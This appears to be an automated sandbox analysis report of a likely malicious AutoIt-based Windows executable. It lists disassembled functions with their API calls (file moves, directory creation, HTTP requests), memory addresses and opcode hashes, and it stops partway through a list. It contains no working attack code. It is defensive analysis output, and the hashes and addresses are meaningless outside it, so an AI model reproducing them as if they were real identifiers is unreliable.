                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                                                                        • String ID: close all$Wu
                                                                        • API String ID: 4174999648-1790509019
                                                                        • Opcode ID: 4fd900de9a28da208b58a3ba22ecdd4c26f042792ef41b4fe823b5ed5eb78ac9
                                                                        • Instruction ID: 89fc9d45334329c88beddca7a6314a06ce6e15860ee53b488cbf8147960762b2
                                                                        • Opcode Fuzzy Hash: 4fd900de9a28da208b58a3ba22ecdd4c26f042792ef41b4fe823b5ed5eb78ac9
                                                                        • Instruction Fuzzy Hash: 9BA1C174710212CFC710EF15C985B5AF3A8BF48304F5045AEE909672A2CB78BD96CF99
                                                                        APIs
                                                                        • CreateMenu.USER32 ref: 00448603
                                                                        • SetMenu.USER32(?,00000000), ref: 00448613
                                                                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448697
                                                                        • IsMenu.USER32(?), ref: 004486AB
                                                                        • CreatePopupMenu.USER32 ref: 004486B5
                                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004486EC
                                                                        • DrawMenuBar.USER32 ref: 004486F5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                        • String ID: 0
                                                                        • API String ID: 161812096-4108050209
                                                                        • Opcode ID: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                                                        • Instruction ID: 1651b4fd0bf3e4e6d8e032b2651979207be8780685d2f09cc615cc8e1c1775d8
                                                                        • Opcode Fuzzy Hash: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                                                        • Instruction Fuzzy Hash: 9D418B75A01209AFEB40DF98D884ADEB7B4FF49314F10815EED189B340DB74A851CFA8
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ae7318f8f9e2d32f1a10471d007c6175db480ae53bc9a704c562829f3cafcd02
                                                                        • Instruction ID: 0df76164974c5272bb459d6cb57aadea20bc0786d7edd9cc69ce034119999088
                                                                        • Opcode Fuzzy Hash: ae7318f8f9e2d32f1a10471d007c6175db480ae53bc9a704c562829f3cafcd02
                                                                        • Instruction Fuzzy Hash: 10A1CE726083009FD310EF65D886B5BB3E9EBC4718F108E2EF559E7281D679E804CB96
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                                                                        • Instruction ID: d12da5a9263b129e99c802cec43d72d92cc496201e336192e500ad81068e5f87
                                                                        • Opcode Fuzzy Hash: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                                                                        • Instruction Fuzzy Hash: D7519C70600305ABEB20DF69CC81F9B77A8AB08715F50462AFE05DB3C1E7B5E8588B58
                                                                        APIs
                                                                          • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                                          • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 00453900
                                                                        • MoveFileW.KERNEL32(?,?), ref: 00453932
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: File$AttributesFullMoveNamePathlstrcmpi
                                                                        • String ID:
                                                                        • API String ID: 978794511-0
                                                                        • Opcode ID: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                                                        • Instruction ID: 27746a5f3a3ee1b1e58f24b17d6851fe0efcb48f315c8e59f2eb92c6bb7fc6f1
                                                                        • Opcode Fuzzy Hash: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                                                        • Instruction Fuzzy Hash: 295155B2C0021996CF20EFA1DD45BEEB379AF44305F0445DEEA0DA3101EB79AB98CB55
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                                                        • Instruction ID: 5433ce91f60fc94fc18d391a2a535eeaa569d09d9a52eba385401fd30cec28f3
                                                                        • Opcode Fuzzy Hash: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                                                        • Instruction Fuzzy Hash: 5B41C4322142405AF3619B6DFCC4BEBBB98FBA6324F10056FF185E55A0C3EA74C58769
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: ClearVariant
                                                                        • String ID:
                                                                        • API String ID: 1473721057-0
                                                                        • Opcode ID: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                                                        • Instruction ID: 82c0e5a8bed1f7f82a0371e607e4af2e63fad7cf90771a3a9635cac59f663638
                                                                        • Opcode Fuzzy Hash: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                                                        • Instruction Fuzzy Hash: C301ECB6000B486AD630E7B9DC84FD7B7ED6B85600F018E1DE69A82514DA75F188CB64
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: _memmove$_memcmp
                                                                        • String ID: '$\$h
                                                                        • API String ID: 2205784470-1303700344
                                                                        • Opcode ID: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                                                                        • Instruction ID: e67660c870af743a7fabfec7c4e9e8b186464fd05e4f656457aecd1ba61caca8
                                                                        • Opcode Fuzzy Hash: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                                                                        • Instruction Fuzzy Hash: 5CE1C070A002498FDB18CFA9D8806BEFBF2FF89304F28816ED84697341D778A945CB54
                                                                        APIs
                                                                        • VariantInit.OLEAUT32(00000000), ref: 0045EA56
                                                                        • VariantCopy.OLEAUT32(00000000), ref: 0045EA60
                                                                        • VariantClear.OLEAUT32 ref: 0045EA6D
                                                                        • VariantTimeToSystemTime.OLEAUT32 ref: 0045EC06
                                                                        • __swprintf.LIBCMT ref: 0045EC33
                                                                        • VariantInit.OLEAUT32(00000000), ref: 0045ECEE
                                                                        Strings
                                                                        • %4d%02d%02d%02d%02d%02d, xrefs: 0045EC2D
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Variant$InitTime$ClearCopySystem__swprintf
                                                                        • String ID: %4d%02d%02d%02d%02d%02d
                                                                        • API String ID: 2441338619-1568723262
                                                                        • Opcode ID: d299e47af636e42a971ad6c2535cd90f83c52cb5e81e18151f02860a5cbf0826
                                                                        • Instruction ID: 6ef9d3a4897ddb850998a39013325e9d2daf595bbef4806ea59c93c68b265cd6
                                                                        • Opcode Fuzzy Hash: d299e47af636e42a971ad6c2535cd90f83c52cb5e81e18151f02860a5cbf0826
                                                                        • Instruction Fuzzy Hash: F8A10873A0061487CB209F5AE48066AF7B0FF84721F1485AFED849B341C736AD99D7E5
                                                                        APIs
                                                                        • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C659
                                                                        • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C677
                                                                        • Sleep.KERNEL32(0000000A), ref: 0042C67F
                                                                        • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C68A
                                                                        • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C73C
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Interlocked$DecrementIncrement$Sleep
                                                                        • String ID: @COM_EVENTOBJ
                                                                        • API String ID: 327565842-2228938565
                                                                        • Opcode ID: ca0223daa9e96e83c575322b086aef175ea6f60956e985fc72e5b4b432ff0b62
                                                                        • Instruction ID: 079f2a2c733a9a3e151bbe14bd9981fb61a061d6167fc58a91b905d371dd4d86
                                                                        • Opcode Fuzzy Hash: ca0223daa9e96e83c575322b086aef175ea6f60956e985fc72e5b4b432ff0b62
                                                                        • Instruction Fuzzy Hash: 18D1D271A002198FDB10EF94C985BEEB7B0FF45304F60856AE5057B392D778AE46CB98
                                                                        APIs
                                                                        • VariantClear.OLEAUT32(?), ref: 0047031B
                                                                        • VariantClear.OLEAUT32(?), ref: 0047044F
                                                                        • VariantInit.OLEAUT32(?), ref: 004704A3
                                                                        • DispCallFunc.OLEAUT32(?,?,?,00000015,?,?,?,?), ref: 00470504
                                                                        • VariantClear.OLEAUT32(?), ref: 00470516
                                                                          • Part of subcall function 00435481: VariantCopy.OLEAUT32(?,?), ref: 00435492
                                                                        • VariantCopy.OLEAUT32(?,?), ref: 0047057A
                                                                          • Part of subcall function 00435403: VariantClear.OLEAUT32(?), ref: 00435414
                                                                        • VariantClear.OLEAUT32(00000000), ref: 0047060D
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Variant$Clear$Copy$CallDispFuncInit
                                                                        • String ID: H
                                                                        • API String ID: 3613100350-2852464175
                                                                        • Opcode ID: 6648f1ef670bc3d986ccb21afe65586efb25ba61d746718973159b73a8bf9b89
                                                                        • Instruction ID: 4e55d858753f5aac0b63ea9498fb9ef25a468b81cfd7169f1740116cc4944d08
                                                                        • Opcode Fuzzy Hash: 6648f1ef670bc3d986ccb21afe65586efb25ba61d746718973159b73a8bf9b89
                                                                        • Instruction Fuzzy Hash: 93B15BB5605311EFD710DF54C880A6BB3A4FF88308F049A2EFA8997351D738E951CB9A
                                                                        APIs
                                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AAC5
                                                                        • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AAFA
                                                                        • InternetQueryOptionW.WININET(00000000,0000001F,00000000,00001000), ref: 0044AB5E
                                                                        • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0044AB74
                                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB83
                                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,00001000,00000000), ref: 0044ABBB
                                                                          • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                                                                        • String ID:
                                                                        • API String ID: 1291720006-3916222277
                                                                        • Opcode ID: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                                                        • Instruction ID: 89538bfc19842651326e528327905a39262a83d8aa3acd63c003c629d13479a9
                                                                        • Opcode Fuzzy Hash: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                                                        • Instruction Fuzzy Hash: FA51B1756403087BF710DF56DC86FEBB7A8FB88715F00851EFB0196281D7B8A5148BA8
                                                                        APIs
                                                                        • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FC48
                                                                        • IsMenu.USER32(?), ref: 0045FC5F
                                                                        • CreatePopupMenu.USER32 ref: 0045FC97
                                                                        • GetMenuItemCount.USER32(?), ref: 0045FCFD
                                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0045FD26
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                        • String ID: 0$2
                                                                        • API String ID: 93392585-3793063076
                                                                        • Opcode ID: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                                                        • Instruction ID: a5f6d3c146e885c54ead74f35c39eec4acd60bc9fc93d28bc39e3d14768ea649
                                                                        • Opcode Fuzzy Hash: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                                                        • Instruction Fuzzy Hash: B55192719002099BDB11DF69D888BAF7BB4BB44319F14853EEC15DB282D3B8984CCB66
                                                                        APIs
                                                                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 004352E6
                                                                        • VariantClear.OLEAUT32(?), ref: 00435320
                                                                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 00435340
                                                                        • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00435373
                                                                        • VariantClear.OLEAUT32(?), ref: 004353B3
                                                                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 004353F6
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: ArrayDataSafeVariant$ClearUnaccess$AccessChangeType
                                                                        • String ID: crts
                                                                        • API String ID: 586820018-3724388283
                                                                        • Opcode ID: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                                                        • Instruction ID: e94501f388d0d73ced66c0aa9444ce68fa972137b9c89e1913ae9ea64c05cbbc
                                                                        • Opcode Fuzzy Hash: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                                                        • Instruction Fuzzy Hash: DE418BB5200208EBDB10CF1CD884A9AB7B5FF9C314F20852AEE49CB351E775E911CBA4
                                                                        APIs
                                                                          • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 0044BC09
                                                                        • MoveFileW.KERNEL32(?,?), ref: 0044BC3F
                                                                        • _wcscat.LIBCMT ref: 0044BCAF
                                                                        • _wcslen.LIBCMT ref: 0044BCBB
                                                                        • _wcslen.LIBCMT ref: 0044BCD1
                                                                        • SHFileOperationW.SHELL32(?), ref: 0044BD17
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
                                                                        • String ID: \*.*
                                                                        • API String ID: 2326526234-1173974218
                                                                        • Opcode ID: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                                                        • Instruction ID: cfb238852dc788c6f4e4306d35388aa956c556a9525b71239849112dc74cb112
                                                                        • Opcode Fuzzy Hash: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                                                        • Instruction Fuzzy Hash: 5C3184B1800219AACF14EFB1DC85ADEB3B5AF48304F5095EEE90997211EB35D748CB98
                                                                        APIs
                                                                          • Part of subcall function 00433244: _wcsncpy.LIBCMT ref: 0043325C
                                                                        • _wcslen.LIBCMT ref: 004335F2
                                                                        • GetFileAttributesW.KERNEL32(?), ref: 0043361C
                                                                        • GetLastError.KERNEL32 ref: 0043362B
                                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 0043363F
                                                                        • _wcsrchr.LIBCMT ref: 00433666
                                                                          • Part of subcall function 004335CD: CreateDirectoryW.KERNEL32(?,00000000), ref: 004336A7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                                                                        • String ID: \
                                                                        • API String ID: 321622961-2967466578
                                                                        • Opcode ID: bb0dad1fe383a450cc5ca78da39c882eba2540a6c71c70dd25c8590f96c38e52
                                                                        • Instruction ID: 66c6ecc179b40ab72a0151a8d865592f5e80cbeaaa2383c239fb12261b929cf9
                                                                        • Opcode Fuzzy Hash: bb0dad1fe383a450cc5ca78da39c882eba2540a6c71c70dd25c8590f96c38e52
                                                                        • Instruction Fuzzy Hash: C72129719013146ADF30AF25AC06BEB73AC9B05715F10569AFD18C2241E6799A888BE9
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: __wcsnicmp
                                                                        • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                        • API String ID: 1038674560-2734436370
                                                                        • Opcode ID: 8f8f9edfa5db0492502b932a8328ea4ae50c7534afe07431ae24ccbcd5f30aff
                                                                        • Instruction ID: d05ed79ef8649e951018b8bbb1c2d61e3c33a7345c6b0b1fc41c187b8edaa79f
                                                                        • Opcode Fuzzy Hash: 8f8f9edfa5db0492502b932a8328ea4ae50c7534afe07431ae24ccbcd5f30aff
                                                                        • Instruction Fuzzy Hash: 1221003365151066E72176199C82FDBB3989FA5314F04442BFE049B242D26EF99A83E9
                                                                        APIs
                                                                        • GetModuleHandleW.KERNEL32(00000000,004A90E8,?,00000100,?,004A7F6C), ref: 00434057
                                                                        • LoadStringW.USER32(00000000), ref: 00434060
                                                                        • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00434075
                                                                        • LoadStringW.USER32(00000000), ref: 00434078
                                                                        • _wprintf.LIBCMT ref: 004340A1
                                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004340B9
                                                                        Strings
                                                                        • %s (%d) : ==> %s: %s %s, xrefs: 0043409C
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: HandleLoadModuleString$Message_wprintf
                                                                        • String ID: %s (%d) : ==> %s: %s %s
                                                                        • API String ID: 3648134473-3128320259
                                                                        • Opcode ID: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                                                        • Instruction ID: 3f99f1473d628bc1a501e0113e735bb0cc043e2cca9b2706ac47da9b95460e2a
                                                                        • Opcode Fuzzy Hash: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                                                        • Instruction Fuzzy Hash: EB016CB26903187EE710E754DD06FFA376CEBC4B11F00459AB708A61C49AF469848BB5
                                                                        APIs
                                                                        • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048D148,00000008,00417A44,00000000,00000000,?,004115F6,?,00401BAC,?,?,?), ref: 0041794D
                                                                        • __lock.LIBCMT ref: 00417981
                                                                          • Part of subcall function 004182CB: __mtinitlocknum.LIBCMT ref: 004182E1
                                                                          • Part of subcall function 004182CB: __amsg_exit.LIBCMT ref: 004182ED
                                                                          • Part of subcall function 004182CB: EnterCriticalSection.KERNEL32(004115F6,004115F6,?,00417986,0000000D,?,004115F6,?,00401BAC,?,?,?), ref: 004182F5
                                                                        • InterlockedIncrement.KERNEL32(FF00482A), ref: 0041798E
                                                                        • __lock.LIBCMT ref: 004179A2
                                                                        • ___addlocaleref.LIBCMT ref: 004179C0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
